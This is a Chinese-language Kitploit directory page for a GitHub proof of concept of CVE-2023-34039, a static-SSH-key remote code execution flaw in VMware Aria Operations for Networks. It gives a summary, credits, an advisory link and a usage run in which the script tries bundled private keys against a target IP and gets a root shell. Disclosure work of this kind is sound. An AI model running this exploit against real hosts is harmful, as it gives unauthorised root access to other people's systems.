Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-34039 — CVE-2023-34039 | Kitploit
工具/GitHubGitHub/syedhafiz1234/cve-2023-34039
权限提升漏洞分析漏洞利用渗透测试云安全远程访问工具
GitHubsyedhafiz1234/cve-2023-34039

CVE-2023-34039

CVE-2023-34039

查看仓库
1133年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-34039

CVE-2023-34039 的 POC:VMWare Aria Operations for Networks (vRealize Network Insight) 静态SSH密钥远程代码执行

技术分析

漏洞的根本原因分析可在我的博客中找到:

https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/

poc

总结

VMWare Aria Operations for Networks (vRealize Network Insight) 从6.0到6.10版本没有为 support 和 ubuntu 用户重新生成SSH密钥,使得具有SSH访问权限的攻击者能够获得该产品的 root shell访问权限。

此问题由 Harsh Jaiswal (@rootxharsh) 和 Rahul Maini (@iamnoooob) 在 ProjectDiscovery Research 报告给VMWare。

我只是编写了漏洞利用程序,如果这能称之为漏洞利用的话,因为它基本上是一个SSH命令包装器。

使用方法

root@kitploit:~
python CVE-2023-34039.py --target 192.168.1.16
(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)

(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)

(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_collector

(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_platform

(*) Trying key: keys/vrni-6.10.0/id_rsa_vnera_keypair_6.10.0_platform


********************************** ATTENTION **********************************
 NTP Service is not healthy.
 IMPACT: It may affect the proper working of other services.
 ACTION: Restore the service using 'ntp' CLI command.
********************************** ATTENTION **********************************
support@vrni-platform-release:~$ sudo -i
root@vrni-platform-release:~# id
uid=0(root) gid=0(root) groups=0(root)
root@vrni-platform-release:~# hostname
vrni-platform-release
root@vrni-platform-release:~# 

缓解措施

更新到最新版本,或按照Progress Advisory中的说明进行缓解

  • https://www.vmware.com/security/advisories/VMSA-2023-0018.html
下载工具